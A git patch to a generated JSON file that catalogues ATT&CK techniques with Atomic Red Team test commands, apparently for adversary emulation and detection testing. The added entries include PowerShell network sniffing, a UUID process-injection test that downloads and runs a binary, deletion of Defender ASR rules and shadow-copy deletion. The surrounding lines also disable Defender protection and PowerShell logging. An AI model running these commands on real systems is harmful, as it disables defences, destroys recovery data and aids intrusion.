From 8ac80e6a4ec1b01982900a56cf3e3a79b3e0f898 Mon Sep 17 00:00:00 2001 From: MSAdministrator Date: Thu, 15 Feb 2024 03:13:06 +0000 Subject: [PATCH] commit message --- data_collector/generated_attck_data_v3.json | 147 ++++++++++++++++++-- 1 file changed, 135 insertions(+), 12 deletions(-) diff --git a/data_collector/generated_attck_data_v3.json b/data_collector/generated_attck_data_v3.json index 39b90f4..89ee875 100644 --- a/data_collector/generated_attck_data_v3.json +++ b/data_collector/generated_attck_data_v3.json @@ -215322,6 +215322,7 @@ "sudo /tmp/t1040_linux_pcapdemo -4 -p 6 -t 3\n", "sudo /tmp/t1040_linux_pcapdemo -4 -P -p 17 -t 3\n", "sudo /tmp/t1040_linux_pcapdemo -a -f -t 3\n", + "New-NetEventSession -Name Capture007 -LocalFilePath \"$ENV:Temp\\sniff.etl\"\nAdd-NetEventPacketCaptureProvider -SessionName Capture007 -TruncationLength 100\nStart-NetEventSession -Name Capture007\nStop-NetEventSession -Name Capture007\nRemove-NetEventSession -Name Capture007\n", "powershell/collection/packet_capture", "python/collection/linux/sniffer", "python/collection/osx/sniffer", @@ -215894,6 +215895,20 @@ "name": "bash", "elevation_required": true } + }, + { + "name": "PowerShell Network Sniffing", + "auto_generated_guid": "9c15a7de-de14-46c3-bc2a-6d94130986ae", + "description": "PowerShell Built-in Cmdlets to capture network traffic.\nhttps://learn.microsoft.com/en-us/powershell/module/neteventpacketcapture/new-neteventsession?view=windowsserver2022-ps", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "New-NetEventSession -Name Capture007 -LocalFilePath \"$ENV:Temp\\sniff.etl\"\nAdd-NetEventPacketCaptureProvider -SessionName Capture007 -TruncationLength 100\nStart-NetEventSession -Name Capture007\nStop-NetEventSession -Name Capture007\nRemove-NetEventSession -Name Capture007\n", + "cleanup_command": "del $ENV:Temp\\sniff.etl", + "name": "powershell", + "elevation_required": true + } } ] } @@ -278357,6 +278372,7 @@ "$process = Start-Process C:\\Windows\\System32\\werfault.exe -passthru\n\\T1055\\bin\\x64\\CreateRemoteThreadNative.exe -pid $process.Id -debug\n", "$PathToAtomicsFolder\\T1055\\bin\\x64\\CreateThread.exe -debug\n", "$PathToAtomicsFolder\\T1055\\bin\\x64\\CreateThreadNative.exe -debug\n", + "Start-Process \"\\T1055\\bin\\x64\\uuid_injection.exe\"\nStart-Sleep -Seconds 7\nGet-Process -Name Notepad -ErrorAction SilentlyContinue | Stop-Process -Force", "powershell/code_execution/invoke_dllinjection", "powershell/code_execution/invoke_reflectivepeinjection", "powershell/code_execution/invoke_shellcode", @@ -279316,7 +279332,36 @@ "name": "powershell", "elevation_required": false, "command": "$PathToAtomicsFolder\\T1055\\bin\\x64\\CreateThreadNative.exe -debug\n", - "cleanup_command": "Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue" + "cleanup_command": "Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue\n" + } + }, + { + "name": "UUID custom process Injection", + "auto_generated_guid": "0128e48e-8c1a-433a-a11a-a5304734f1e1", + "description": "The UUIDs Process Injection code was first introduced by the NCC Group. The code can be stored in UUID forms on the heap and converted back to binary via UuidFromStringA at runtime. In this new custom version of UUID injection, EnumSystemLocalesA is the only API called to execute the code. We used custom UuidToString and UuidFromString implementations to avoid using UuidFromStringA and RPCRT4.dll, thereby eliminating the static signatures. This technique also avoided the use of VirtualAlloc, WriteProcessMemory and CreateThread\n\nThe injected shellcode will open a message box and a notepad.\n\nReference to NCC Group: https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/\nConcept from: http://ropgadget.com/posts/abusing_win_functions.html\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "exe_binary": { + "description": "PE binary", + "type": "path", + "default": "PathToAtomicsFolder\\T1055\\bin\\x64\\uuid_injection.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Portable Executable to inject must exist at specified location (#{exe_binary})\n", + "prereq_command": "if (Test-Path \"#{exe_binary}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{exe_binary}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/bin/x64/uuid_injection.exe\" -OutFile \"#{exe_binary}\"\n" + } + ], + "executor": { + "command": "Start-Process \"#{exe_binary}\"\nStart-Sleep -Seconds 7\nGet-Process -Name Notepad -ErrorAction SilentlyContinue | Stop-Process -Force", + "cleanup_command": "Get-Process -Name Notepad -ErrorAction SilentlyContinue | Stop-Process -Force", + "name": "powershell", + "elevation_required": true } } ] @@ -330215,7 +330260,7 @@ "reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\" /v HideSCAPower /t REG_DWORD /d 1 /f\n", "reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\" /v HideSCAVolume /t REG_DWORD /d 1 /f\n", "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced /v ShowInfoTip /t REG_DWORD /d 0 /f\nreg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced /v ShowCompColor /t REG_DWORD /d 0 /f\n", - "reg add HKCU\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\ModuleLogging /v EnableModuleLogging /t REG_DWORD /d 0 /f\nreg add HKCU\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging /v EnableScriptBlockLogging /t REG_DWORD /d 0 /f\nreg add HKCU\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\Transcription /v EnableTranscripting /t REG_DWORD /d 0 /f\nreg add HKCU\\Software\\Policies\\Microsoft\\Windows\\PowerShell /v EnableScripts /t REG_DWORD /d 0 /f\nREM do a little cleanup immediately to avoid execution issues with later tests\nreg delete HKCU\\Software\\Policies\\Microsoft\\Windows\\PowerShell /v EnableScripts /f >nul 2>&1\n", + "reg add HKCU\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\ModuleLogging /v EnableModuleLogging /t REG_DWORD /d 0 /f\nreg add HKCU\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging /v EnableScriptBlockLogging /t REG_DWORD /d 0 /f\nreg add HKCU\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\Transcription /v EnableTranscripting /t REG_DWORD /d 0 /f\nreg add HKCU\\Software\\Policies\\Microsoft\\Windows\\PowerShell /v EnableScripts /t REG_DWORD /d 0 /f\nreg delete HKCU\\Software\\Policies\\Microsoft\\Windows\\PowerShell /v EnableScripts /f >nul 2>&1\n", "REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\AtomicSafeMode\" /VE /T REG_SZ /F /D \"Service\"\n", "REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\AtomicSafeMode\" /VE /T REG_SZ /F /D \"Service\"\n", "reg add HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PushNotifications /v ToastEnabled /t REG_DWORD /d 0 /f\n", @@ -331012,7 +331057,7 @@ "windows" ], "executor": { - "command": "reg add HKCU\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\ModuleLogging /v EnableModuleLogging /t REG_DWORD /d 0 /f\nreg add HKCU\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging /v EnableScriptBlockLogging /t REG_DWORD /d 0 /f\nreg add HKCU\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\Transcription /v EnableTranscripting /t REG_DWORD /d 0 /f\nreg add HKCU\\Software\\Policies\\Microsoft\\Windows\\PowerShell /v EnableScripts /t REG_DWORD /d 0 /f\nREM do a little cleanup immediately to avoid execution issues with later tests\nreg delete HKCU\\Software\\Policies\\Microsoft\\Windows\\PowerShell /v EnableScripts /f >nul 2>&1\n", + "command": "reg add HKCU\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\ModuleLogging /v EnableModuleLogging /t REG_DWORD /d 0 /f\nreg add HKCU\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging /v EnableScriptBlockLogging /t REG_DWORD /d 0 /f\nreg add HKCU\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\Transcription /v EnableTranscripting /t REG_DWORD /d 0 /f\nreg add HKCU\\Software\\Policies\\Microsoft\\Windows\\PowerShell /v EnableScripts /t REG_DWORD /d 0 /f\nreg delete HKCU\\Software\\Policies\\Microsoft\\Windows\\PowerShell /v EnableScripts /f >nul 2>&1\n", "cleanup_command": "reg delete HKCU\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\ModuleLogging /v EnableModuleLogging /f >nul 2>&1\nreg delete HKCU\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging /v EnableScriptBlockLogging /f >nul 2>&1\nreg delete HKCU\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\Transcription /v EnableTranscripting /f >nul 2>&1\n", "name": "command_prompt", "elevation_required": true @@ -361413,12 +361458,12 @@ { "description": "Computer must have python 3 installed\n", "prereq_command": "py -3 --version >nul 2>&1\nexit /b %errorlevel%\n", - "get_prereq_command": "echo \"Python 3 must be installed manually\"\n" + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction ignore -Force | Out-Null\ninvoke-webrequest \"https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\python_setup.exe\"\nStart-Process -FilePath \"PathToAtomicsFolder\\..\\ExternalPayloads\\python_setup.exe\" -ArgumentList \"/quiet InstallAllUsers=1 PrependPath=1 Include_test=0\" -Wait\n" }, { "description": "Computer must have pip installed\n", "prereq_command": "py -3 -m pip --version >nul 2>&1\nexit /b %errorlevel%\n", - "get_prereq_command": "echo \"PIP must be installed manually\"\n" + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction ignore -Force | Out-Null\ninvoke-webrequest \"https://bootstrap.pypa.io/ez_setup.py\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\" \ninvoke-webrequest \"https://bootstrap.pypa.io/get-pip.py\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\ncmd /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"\ncmd /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\n" }, { "description": "pypykatz must be installed and part of PATH\n", @@ -530975,6 +531020,8 @@ "reg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\" /v \"DisableAntiSpyware\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\" /v \"DisableAntiVirus\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v \"DisableBehaviorMonitoring\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v \"DisableIntrusionPreventionSystem\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v \"DisableIOAVProtection\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v \"DisableOnAccessProtection\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v \"DisableRealtimeMonitoring\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v \"DisableRoutinelyTakingAction\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v \"DisableScanOnRealtimeEnable\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v \"DisableScriptScanning\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Reporting\" /v \"DisableEnhancedNotifications\" /t REG_DWORD /d \"1\" /f >NUL 2>nul \nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet\" /v \"DisableBlockAtFirstSeen\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet\" /v \"SpynetReporting\" /t REG_DWORD /d \"0\" /f >NUL 2>nul\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\MpEngine\" /v \"MpEnablePus\" /t REG_DWORD /d \"0\" /f >NUL 2>nul\nreg add \"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender Security Center\\App and Browser protection\" /v \"DisallowExploitProtectionOverride\" /t REG_DWORD /d \"0\" /f >NUL 2>nul\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Features\" /v \"TamperProtection\" /t REG_DWORD /d \"0\" /f >NUL 2>nul\nreg add \"HKLM\\software\\microsoft\\windows defender\\spynet\" /v \"SubmitSamplesConsent\" /t REG_DWORD /d \"0\" /f >NUL 2>nul\nreg add \"HKLM\\Software\\Microsoft\\Windows Defender\" /v \"PUAProtection\" /t REG_DWORD /d \"0\" /f >NUL 2>nul\n", "Set-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\" -Name \"DisableAntiSpyware\" -Value 1 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\" -Name \"DisableAntiVirus\" -Value 1 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" -Name \"DisableBehaviorMonitoring\" -Value 1 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" -Name \"DisableIntrusionPreventionSystem\" -Value 1 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" -Name \"DisableIOAVProtection\" -Value 1 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" -Name \"DisableOnAccessProtection\" -Value 1 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" -Name \"DisableRealtimeMonitoring\" -Value 1 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" -Name \"DisableRoutinelyTakingAction\" -Value 1 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" -Name \"DisableScanOnRealtimeEnable\" -Value 1 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" -Name \"DisableScriptScanning\" -Value 1 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Reporting\" -Name \"DisableEnhancedNotifications\" -Value 1 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet\" -Name \"DisableBlockAtFirstSeen\" -Value 1 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet\" -Name \"SpynetReporting\" -Value 0 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\MpEngine\" -Name \"MpEnablePus\" -Value 0 \nSet-ItemProperty \"HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows Defender Security Center\\App and Browser protection\" -Name \"DisallowExploitProtectionOverride\" -Value 0 \nSet-ItemProperty \"HKLM:\\SOFTWARE\\Microsoft\\Windows Defender\\Features\" -Name \"TamperProtection\" -Value 0 \nSet-ItemProperty \"HKLM:\\software\\microsoft\\windows defender\\spynet\" -Name \"SubmitSamplesConsent\" -Value 0 \nSet-ItemProperty \"HKLM:\\Software\\Microsoft\\Windows Defender\" -Name \"PUAProtection\" -Value 0 \n", "Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false \nConnect-VIServer -Server atomic.local -User root -Password pass\nGet-AdvancedSetting -Entity atomic.local -Name 'Security.AccountLockFailures' | Set-AdvancedSetting -Value '0' -Confirm:$false\nDisconnect-VIServer -Confirm:$false\n", + "$registryPath = \"HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Policy Manager\"\n\nif (-not (Test-Path $registryPath)) {\n New-Item -Path $registryPath -Force\n Write-Host \"Registry key created: $registryPath\"\n}\n\n$registryValueName = \"ASRRules\"\n\nif (Test-Path \"$registryPath\\$registryValueName\") {\n Remove-ItemProperty -Path $registryPath -Name $registryValueName\n Write-Host \"Registry value deleted: $registryValueName\"\n} else {\n New-ItemProperty -Path $registryPath -Name $registryValueName -PropertyType String -Value \"36190899-1602-49e8-8b27-eb1d0a1ce869=1\" -Force\n Write-Host \"Registry value created: $registryValueName\"\n}\n\n\nRemove-ItemProperty -Path $registryPath -Name $registryValueName\nWrite-Host \"Registry value deleted: $registryValueName\"", + "$registryPath = \"HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Windows Defender Exploit Guard\\ASR\\Rules\"\n\nif (-not (Test-Path $registryPath)) {\n New-Item -Path $registryPath -Force\n Write-Host \"Registry key created: $registryPath\"\n}\n\n$newValueName = \"36190899-1602-49e8-8b27-eb1d0a1ce869\"\n$newValueData = \"1\"\nNew-ItemProperty -Path $registryPath -Name $newValueName -PropertyType String -Value $newValueData -Force\nWrite-Host \"Registry value created: $newValueName with data $newValueData\"\n\nRemove-ItemProperty -Path $registryPath -Name $newValueName\nWrite-Host \"Registry value deleted: $newValueName\"", "Set-ItemProperty -Path HKLM:\\Software\\Policies\\Microsoft\\Windows\\PowerShell -Name ExecutionPolicy -Value ByPass;\n $shell = New-Object -ComObject Wscript.Shell\n Set-ExecutionPolicy Bypass | echo $shell.sendkeys(\"Y`r`n\")", "if (Get-Command \"Set-MPPreference\" -ErrorAction SilentlyContinue) {\n Set-MPPreference -DisableRealtimeMonitoring 1;\n} else {\n $service = Get-Service WinDefend -ErrorAction SilentlyContinue;\n if ($service) {\n if ($service.Status -eq \"Running\") {\n Stop-Service WinDefend;\n }\n } else {\n echo \"Windows Defender service not found.\";\n exit 1;\n };\n};\n", "Set-MpPreference -DisableIntrusionPreventionSystem $true;\nSet-MpPreference -DisableIOAVProtection $true;\nSet-MpPreference -DisableRealtimeMonitoring $true;\nSet-MpPreference -DisableScriptScanning $true;\nSet-MpPreference -EnableControlledFolderAccess Disabled;\n" @@ -531919,6 +531966,32 @@ "name": "powershell", "elevation_required": true } + }, + { + "name": "Delete Microsoft Defender ASR Rules - InTune", + "auto_generated_guid": "eea0a6c2-84e9-4e8c-a242-ac585d28d0d1", + "description": "This test simulates the deletion of the ASR rules loaded by Microsoft Defender using the registry. Depending on the deployment, rules can be pushed either using GPO or InTune, This test simulates an InTune-based rules deployment.", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$registryPath = \"HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Policy Manager\"\n\nif (-not (Test-Path $registryPath)) {\n New-Item -Path $registryPath -Force\n Write-Host \"Registry key created: $registryPath\"\n}\n\n$registryValueName = \"ASRRules\"\n\nif (Test-Path \"$registryPath\\$registryValueName\") {\n Remove-ItemProperty -Path $registryPath -Name $registryValueName\n Write-Host \"Registry value deleted: $registryValueName\"\n} else {\n New-ItemProperty -Path $registryPath -Name $registryValueName -PropertyType String -Value \"36190899-1602-49e8-8b27-eb1d0a1ce869=1\" -Force\n Write-Host \"Registry value created: $registryValueName\"\n}\n\n\nRemove-ItemProperty -Path $registryPath -Name $registryValueName\nWrite-Host \"Registry value deleted: $registryValueName\"", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Delete Microsoft Defender ASR Rules - GPO", + "auto_generated_guid": "0e7b8a4b-2ca5-4743-a9f9-96051abb6e50", + "description": "This test simulates the deletion of the ASR rules loaded by Microsoft Defender using the registry. Depending on the deployment, rules can be pushed either using GPO or InTune, This test simulates a GPO-based rules deployment.", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$registryPath = \"HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Windows Defender Exploit Guard\\ASR\\Rules\"\n\nif (-not (Test-Path $registryPath)) {\n New-Item -Path $registryPath -Force\n Write-Host \"Registry key created: $registryPath\"\n}\n\n$newValueName = \"36190899-1602-49e8-8b27-eb1d0a1ce869\"\n$newValueData = \"1\"\nNew-ItemProperty -Path $registryPath -Name $newValueName -PropertyType String -Value $newValueData -Force\nWrite-Host \"Registry value created: $newValueName with data $newValueData\"\n\nRemove-ItemProperty -Path $registryPath -Name $newValueName\nWrite-Host \"Registry value deleted: $newValueName\"", + "name": "powershell", + "elevation_required": true + } } ] } @@ -653591,12 +653664,12 @@ { "description": "Computer must have python 3 installed\n", "prereq_command": "if (python --version) {exit 0} else {exit 1}\n", - "get_prereq_command": "echo \"Python 3 must be installed manually\"\n" + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction ignore -Force | Out-Null\ninvoke-webrequest \"https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\python_setup.exe\"\nStart-Process -FilePath \"PathToAtomicsFolder\\..\\ExternalPayloads\\python_setup.exe\" -ArgumentList \"/quiet InstallAllUsers=1 PrependPath=1 Include_test=0\" -Wait\n" }, { "description": "Computer must have pip installed\n", "prereq_command": "if (pip3 -V) {exit 0} else {exit 1}\n", - "get_prereq_command": "echo \"PIP must be installed manually\"\n" + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction ignore -Force | Out-Null\ninvoke-webrequest \"https://bootstrap.pypa.io/ez_setup.py\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\" \ninvoke-webrequest \"https://bootstrap.pypa.io/get-pip.py\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\ncmd /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"\ncmd /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\n" }, { "description": "adidnsdump must be installed and part of PATH\n", @@ -657342,7 +657415,7 @@ { "description": "Check if python exists on the machine\n", "prereq_command": "if (python --version) {exit 0} else {exit 1}\n", - "get_prereq_command": "echo \"Python 3 must be installed manually\"\n" + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction ignore -Force | Out-Null\ninvoke-webrequest \"https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\python_setup.exe\"\nStart-Process -FilePath \"PathToAtomicsFolder\\..\\ExternalPayloads\\python_setup.exe\" -ArgumentList \"/quiet InstallAllUsers=1 PrependPath=1 Include_test=0\" -Wait\n" } ], "executor": { @@ -672573,10 +672646,52 @@ "phase_name": "defense-evasion" } ], - "command_list": [], + "command_list": [ + "Start-Process \"\\T1027.007\\bin\\ninja_syscall1.exe\"\nStart-Sleep -Seconds 7\nif (Test-Path \"C:\\Users\\Default\\AppData\\Local\\Temp\\hello.log\") { Remove-Item \"C:\\Users\\Default\\AppData\\Local\\Temp\\hello.log\" -Force; Write-Host \"[+] hello.log removed.\" }\n" + ], "commands": [], "queries": [], - "parsed_datasets": [], + "parsed_datasets": [ + { + "source": "atomics/T1027.007/T1027.007.yaml", + "name": "Atomic Red Team Test - Obfuscated Files or Information: Dynamic API Resolution", + "content": { + "attack_technique": "T1027.007", + "display_name": "Obfuscated Files or Information: Dynamic API Resolution", + "atomic_tests": [ + { + "name": "Dynamic API Resolution-Ninja-syscall", + "auto_generated_guid": "578025d5-faa9-4f6d-8390-aae739d507e1", + "description": "This test calls NtCreateFile via API hashing and dynamic syscall resolution. I have dubbed this particular combination of techniques 'Ninja-syscall'. When successful, a new file named 'hello.log' will be created in the default user's temporary folder, which is a common location for a dropper.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "exe_binary": { + "description": "PE binary", + "type": "path", + "default": "PathToAtomicsFolder\\T1027.007\\bin\\ninja_syscall1.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Portable Executable to run must exist at specified location (#{exe_binary})\n", + "prereq_command": "if (Test-Path \"#{exe_binary}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{exe_binary}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.007/bin/ninja_syscall1.exe\" -OutFile \"#{exe_binary}\"\n" + } + ], + "executor": { + "command": "Start-Process \"#{exe_binary}\"\nStart-Sleep -Seconds 7\nif (Test-Path \"C:\\Users\\Default\\AppData\\Local\\Temp\\hello.log\") { Remove-Item \"C:\\Users\\Default\\AppData\\Local\\Temp\\hello.log\" -Force; Write-Host \"[+] hello.log removed.\" }\n", + "cleanup_command": "if (Test-Path \"C:\\Users\\Default\\AppData\\Local\\Temp\\hello.log\") { Remove-Item \"C:\\Users\\Default\\AppData\\Local\\Temp\\hello.log\" -Force; Write-Host \"[+] hello.log removed.\" }", + "name": "powershell", + "elevation_required": true + } + } + ] + } + } + ], "possible_detections": [], "external_reference": [], "controls": [], @@ -703466,10 +703581,18 @@ { "name": "Windows - Delete Volume Shadow Copies via WMI", "auto_generated_guid": "6a3ff8dd-f49c-4272-a658-11c2fe58bd88", - "description": "Deletes Windows Volume Shadow Copies via WMI. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.\nprereq_command: |\n if(!(vssadmin.exe list shadows | findstr \"No items found that satisfy the query.\")) { exit 0 } else { exit 1 }\nget_prereq_command: |\n wmic shadowcopy call create Volume='C:\\'\n", + "description": "Deletes Windows Volume Shadow Copies via WMI. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.\n", "supported_platforms": [ "windows" ], + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Create volume shadow copy of C:\\ .\n", + "prereq_command": "if(!(vssadmin.exe list shadows | findstr \"No items found that satisfy the query.\")) { exit 0 } else { exit 1 }\n", + "get_prereq_command": "wmic shadowcopy call create Volume='C:\\'\n" + } + ], "executor": { "command": "wmic.exe shadowcopy delete\n", "name": "command_prompt", @@ -1216533,5 +1216656,5 @@ ], "relationship_map": {}, "revoked": false, - "last_updated": "2024-02-01T03:05:46.651515+00:00" + "last_updated": "2024-02-15T03:05:42.205821+00:00" } \ No newline at end of file